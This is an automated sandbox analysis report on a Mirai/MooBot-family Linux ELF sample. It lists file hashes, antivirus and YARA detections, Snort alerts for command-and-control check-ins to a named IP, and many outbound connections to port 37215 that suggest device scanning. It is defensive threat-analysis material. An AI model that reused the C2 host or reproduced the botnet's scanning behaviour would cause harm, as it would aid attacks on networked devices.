Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
3wN5NfZaD8.elf

Overview

General Information

Sample name:3wN5NfZaD8.elf
renamed because original name is a hash value
Original sample name:73496a8b42e3064a6057779a513273a1.elf
Analysis ID:1385381
MD5:73496a8b42e3064a6057779a513273a1
SHA1:17ad0f5cc44e18538f30446d795f0e68cd31f82d
SHA256:3df4d63dcc40f1b0e12ebd28bb09cb9eb52c757751d5941653c346586b9e0713
Tags:32elfgafgytmotorola
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1385381
Start date and time:2024-02-02 06:34:19 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 23s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:3wN5NfZaD8.elf
renamed because original name is a hash value
Original Sample Name:73496a8b42e3064a6057779a513273a1.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@19/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/3wN5NfZaD8.elf
PID:5487
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5502, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 5512, Parent: 1289)
  • Default (PID: 5512, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5533, Parent: 1289)
  • Default (PID: 5533, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5544, Parent: 1)
  • systemd-user-runtime-dir (PID: 5544, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
3wN5NfZaD8.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    3wN5NfZaD8.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      3wN5NfZaD8.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x20fa3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20fb7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20fcb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20fdf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20ff3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21007:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2101b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2102f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21043:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21057:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2106b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2107f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21093:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x210a7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x210bb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x210cf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x210e3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x210f7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2110b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2111f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21133:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5487.1.00007f8874001000.00007f8874025000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5487.1.00007f8874001000.00007f8874025000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5487.1.00007f8874001000.00007f8874025000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x20fa3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20fb7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20fcb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20fdf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20ff3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21007:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2101b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2102f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21043:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21057:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2106b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2107f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21093:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x210a7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x210bb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x210cf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x210e3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x210f7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2110b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2111f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21133:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: 3wN5NfZaD8.elf PID: 5487JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: 3wN5NfZaD8.elf PID: 5487Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x197c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1990:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x19a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x19b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x19cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x19e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x19f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1a08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1a1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1a30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1a44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1a58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1a6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1a80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1a94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1aa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1abc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1ad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1ae4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1af8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1b0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.14103.180.149.15649928199902030490 02/02/24-06:34:59.523905
            SID:2030490
            Source Port:49928
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.180.149.15650754199902030490 02/02/24-06:35:10.358637
            SID:2030490
            Source Port:50754
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.180.149.15651482199902030490 02/02/24-06:35:24.055155
            SID:2030490
            Source Port:51482
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.180.149.15651344199902030490 02/02/24-06:35:20.193559
            SID:2030490
            Source Port:51344
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 3wN5NfZaD8.elfAvira: detected
            Source: 3wN5NfZaD8.elfVirustotal: Detection: 56%Perma Link
            Source: 3wN5NfZaD8.elfString: wgetcurlechocatnanotfpt/proc/proc/%d/cmdlineabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:49928 -> 103.180.149.156:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:50754 -> 103.180.149.156:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:51344 -> 103.180.149.156:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:51482 -> 103.180.149.156:19990
            Source: global trafficTCP traffic: 197.140.212.212 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 41.60.105.152 ports 1,2,3,5,7,37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52846 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53036 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60014 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41176 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.59.194.134:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.13.90.138:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.201.204.17:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.252.133.16:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 96.248.150.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.9.219.56:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.215.212.243:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.240.144.233:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 216.136.221.190:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.60.132.191:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.53.4.185:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 43.17.105.15:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.80.154.174:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 222.124.69.125:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.196.4.2:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 191.103.251.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.173.32.114:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.65.63.247:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 121.208.232.31:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.28.180.216:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.252.39.132:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.39.41.185:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.5.183.158:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.115.215.227:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.121.74.18:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.26.169.169:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.110.222.145:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 103.239.193.68:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 154.178.67.208:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.156.187.31:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.182.27.233:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.160.250.157:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 179.32.160.195:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.93.134.164:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.215.151.71:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.206.34.8:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.99.13.39:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 148.78.225.58:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.207.19.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.120.116.247:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.143.115.255:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.3.116.172:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.75.201.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.195.217.154:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.253.223.23:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 209.115.55.173:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.89.248.157:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.166.180.129:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.38.90.89:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.64.115.213:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.90.184.35:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 54.152.160.130:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.113.212.111:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 189.68.63.133:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.158.74.112:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.62.152.231:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.247.241.154:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.109.95.20:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.182.62.79:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 124.16.198.177:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 203.212.23.241:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.179.195.58:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.115.254.250:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.156.86.195:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 32.191.121.160:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.38.74.188:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.12.192.203:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.50.158.218:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.135.93.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.248.45.220:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.100.150.149:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 69.35.235.148:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.216.253.64:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.116.237.255:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.112.87.226:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.250.56.225:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.4.14.27:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 201.115.111.56:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.64.152.45:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.79.156.18:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.31.4.92:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 45.246.250.2:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.125.196.228:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 52.14.5.188:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 53.142.56.48:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.243.70.249:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.227.7.62:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 125.221.18.47:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.205.50.218:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.17.0.100:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 154.180.42.155:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.219.30.135:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.218.11.0:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.87.179.129:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 114.95.218.246:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.18.230.205:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 139.181.12.219:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.91.226.87:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.22.153.28:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.237.81.22:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.194.180.158:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.199.6.74:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.3.153.240:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.200.33.206:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.60.105.152:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.17.104.42:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.52.134.89:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 190.74.237.6:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 125.24.113.7:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.124.241.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.104.71.193:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.237.75.110:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.155.200.79:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.50.8.160:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.8.178.199:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.184.194.50:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 147.37.234.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.159.128.238:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.57.103.79:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.77.163.204:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 2.4.49.202:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.13.223.141:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 195.63.4.223:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.136.40.110:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 106.241.243.68:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 94.13.248.55:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 148.174.122.201:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.20.103.39:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 189.10.109.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.255.189.8:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.164.27.195:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.161.88.211:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.24.132.172:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.17.104.211:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.27.94.16:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 181.132.203.28:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.108.172.195:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 61.81.172.162:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.173.192.194:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.90.79.129:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 148.13.7.213:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.19.248.83:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.68.162.78:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 81.25.234.15:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 209.202.16.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.93.73.16:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.193.22.189:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.34.130.227:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.151.157.59:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.82.101.225:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.131.209.253:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.49.218.91:37215
